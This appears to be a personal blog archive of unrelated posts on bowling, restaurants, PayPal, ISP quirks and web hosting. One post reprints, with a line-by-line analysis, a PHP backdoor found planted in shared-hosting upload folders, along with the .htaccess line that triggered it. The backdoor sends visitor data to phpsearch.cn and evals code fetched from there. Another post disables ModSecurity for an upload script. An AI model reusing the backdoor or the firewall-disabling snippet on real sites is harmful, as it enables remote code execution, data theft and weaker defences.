Cosmic Bowl Sucks

Well, to be really honest the light setting and the loud music is really cool. However I feel that the bowling alley is poorly maintained. Discolored screens and malfunctioning equipment really helped to spoil the mood for a good bowling night.

I was playing in lane 36 on Friday after work and I counted at least 8 times of malfunction. It’s either the pinsetter didn’t place any pins, or the spotting tongs kept slipping one pin off. It sucks and it really spoiled the playing mood.

I don’t recommend Cosmic Bowl Mid Valley either for any company events or casual games.

Upload Folder Invasions and Security

I was doing a routine backup job for a client’s website hosted on Exabytes the other day and noticed something funny. There were supposed to be image, pdf, and video files in the upload folders but there were also .htaccess and PHP files in the main upload folder and each of the subfolders.

The first thing that crossed my mind was that my code was not secure enough – it’s difficult to handle Flash upload security so I used some most basic techniques to prevent illegal uploads. However I decided to venture into Internet Webhosting’s server (I also have an account there) and saw the same thing happening on a fellow blogger’s WordPress upload folder – which coincidentally is in the same server as my other account. I have so many “other” accounts I sometimes lost track.

Testing further I found that I am able to manipulate files located in other’s upload folder if the permission of 777 (drwxrwxrwx) is set. I was able to create new files, move existing files, and even worst delete them. Technically this is because the webserver process (apache for Apache 1.x and httpd for Apache 2.x) most usually runs as the user nobody or other common user account on the server. So it really does not matter who runs a PHP file from the browser, the server thinks the user always have the proper permission.

So in a normal shared hosting other users are actually able to copy your source code if you’re running a custom one (in contrast to WordPress which is publicly available).

This problem does not relate to other parts of the website or the database.

I am NOT going to post the codes that I use to check and test these claims, so it’s really up to you whether or not to trust me.

However the following code was in the foreign PHP files (they named using numbers – XXXXX.php), and they were in one line most probably to prevent people from understanding it. I cleaned it up to improve readability

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
< ?php
error_reporting(0);
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
 
$z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".e." . base64_encode($i) . "." . base64_encode($j);
$f = base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "51e1225f5f7bca58cb02a7cf6a96dddd") 
	$f = $_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
else if($c = file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
	eval($c);
else
{
	$cu = curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
	curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
	$o = curl_exec($cu);
	curl_close($cu);
	eval($o);
};
?>

Lines 3-12 collects data about the request.
Line 14 dumps all of the collected information to a variable $z
$f is the variable that holds the URL of the culprit: phpsearch.cn

print base64_decode('cGhwc2VhcmNoLmNu');

Lines 16-17 handles some queries (I think if the request comes from them).
Line 18 tries to include the remote file http://ads1.phpsearch.cn/?(collected_data)

print base64_decode('aHR0cDovL2FkczEu');

Line 19 tries to load the remote file http://7.phpsearch.cn/?(collected_data)

print base64_decode('aHR0cDovLzcu');

And the final attempt in lines 23-27 tries to use the CURL extension to load http://71.phpsearch.cn/?(collected_data)

print base64_decode('aHR0cDovLzcxLg==');

How is this possible? Well, they also uploaded .htaccess files that looks like this:

Options -MultiViews
ErrorDocument 404 //path/to/upload/folder/subfolder/XXXXXX.php

And yes, it only activates if a 404 (file not found) is encountered on the folder. But still, I don’t like the intrusion. Wouldn’t you?

I can’t really think of any workaround to the permission problem as users will always have to change the permission of upload folder to 777. Even changing the group ownership to the group used by the httpd process will not prevent access to other users.

However GoDaddy seems to have a good technique in overcoming this problem as I can’t access other users’ folders. It has been a while since I wanted to find out how they implemented this – I noticed it the first time I use their hosting since I didn’t have to change permissions for my upload folders.

PayPal in Bahasa Melayu

I recently received an email from PayPal announcing that they now support additional languages. One of them is my native tongue, Bahasa Melayu.

However when I clicked on the Malaysia flag it directs me to the same page as Bahasa Indonesia. Although many part of the Internet has already acknowledged and are well aware that these two languages are different, I am a tad surprised that PayPal is not one of them 🙂

[singlepic=3,420,800]

2.59MB/Sec Download

I had to download the Flex SDK for work today and when I saw the file size I thought I can take some time to get coffee and a smoking break but I was wrong. I am not making it a big deal but I guess home users in Malaysia has never experienced this before.

The 118MB file was downloaded in less than a minute!

Oh yes, the file is downloaded to a server in the HQ in Massachusetts.

How I wish I get that at home! I am wondering whether US homes also get the same kind of speed. My dear US readers could you please shed some light upon us?

Weird IP Mismatch on TMNET Network

Tonight’s Internet access was annoyingly slow so I thought of recycling my ADSL connection. Out of habit I opened up WhatIsMyIP.us and was presented with a weird IP.

The top text with black background is the actual IP my router was assigned with (60.52.127.200).

And then I recycled my ADSL connection. The new IP was 60.50.203.72. However when I opened the site above again it still shows me the same IP. There is something fishy about this.

I tried ProxyWay and here’s what I got:

And here’s from CheckIP:

The two sites that gave me the correct and matching IP are IPChicken and IP-adress:

What the hell is wrong? Since TMNET has the reputation of doing stupid things right now I am thinking that they are testing some kind of HTTP bypassing. This is because the other traffic that I tested was not affected (e.g. SSH and FTP) and I see my “real” IP fine.

Anyone else is experiencing this twilight-zone scenario?

What Happened to Marché Mövenpick

I went to have lunch at at The Curve on Saturday and I was a bit disappointed by the lack of staff and all the waiting we had to do. While I understand that the system is for you to order and wait they should not have asked people to come back in 5 minutes if we actually have to wait for 20.

I was ordering the 1/2 Roasted Chicken meal and the guy who is attending the stall is also the same guy who cooks the mixed vegetable at the next stall. And the funniest thing of all is while the menu said roasted chicken they are actually reheating it on the grill. Yes, on the grill. So the chicken gets charred and tasted like charcoal, and loses all its moisture. The vegetable is all dried up, and I think that the menu has been changed (many meals have been removed).

The roasted chicken in the same restaurant used to be moist, juicy and the gravy was superb. This time they provided BBQ sauce.

And using the grill also means that it takes a lot longer than the oven. I saw that the oven was switched off so I think this may be a step to cut some cost?

What’s wrong with the restaurant? Are they so affected by the economy that they decided to provide improper food, lousy service, and jeopardize the whole business?

I won’t be visiting this restaurant anytime soon unless anyone really wants to eat something from the menu (the mixed vege and the sauteed mushroom still tastes the same). I’ll just go to Kenny Rogers for roasted chicken.

Flash Uploader Error

I was using YUI Uploader for a personal project and it works very well on my development notebook and server. However when the code is live on the server the Flash uploader failed with this error message:

[IOErrorEvent type="ioError" bubbles=false cancelable=false eventPhase=2 text="Error #2038"]

After a while I realized that it must be something server-side because when I used WireShark to see the traffic the server returns Error 500. The traffic is not captured by Firebug because it is Flash traffic.

The culprit is ModSecurity, a third party module used by most hosting companies. ModSecurity is a web application firewall that can work either embedded into Apache or as a reverse proxy.

A quick fix to allow uploads is to include these in the .htaccess file. These handle different Apache and ModSecurity versions and since we include the IfModule directive if the module is unavailable no error will be thrown. This relieves the need to consider what version of Apache and ModSecurity is used on the server.

For this example the script that handles the upload is named upload.php.

# Apache 1.x and ModSecurity 1.x
<IfModule mod_security.c>
   <Files upload.php>
      SecFilterEngine Off
      SecFilterScanPOST Off
   </Files>
</IfModule>

# Apache 2.x and ModSecurity 1.x
<IfModule security_module>
   <Files upload.php>
      SecFilterEngine Off
      SecFilterScanPOST Off
   </Files>
</IfModule>

# Apache 2.x and ModSecurity 2.x
<IfModule security2_module>
   <Files upload.php>
      SecRuleEngine Off
      SecRequestBodyAccess Off
   </Files>
</IfModule>

That’s it! This fixes the Flash uploader problem.

By the way it might be useful to let you know that this issue was encountered on a server hosted under the Ebiz Linux package by Exabytes.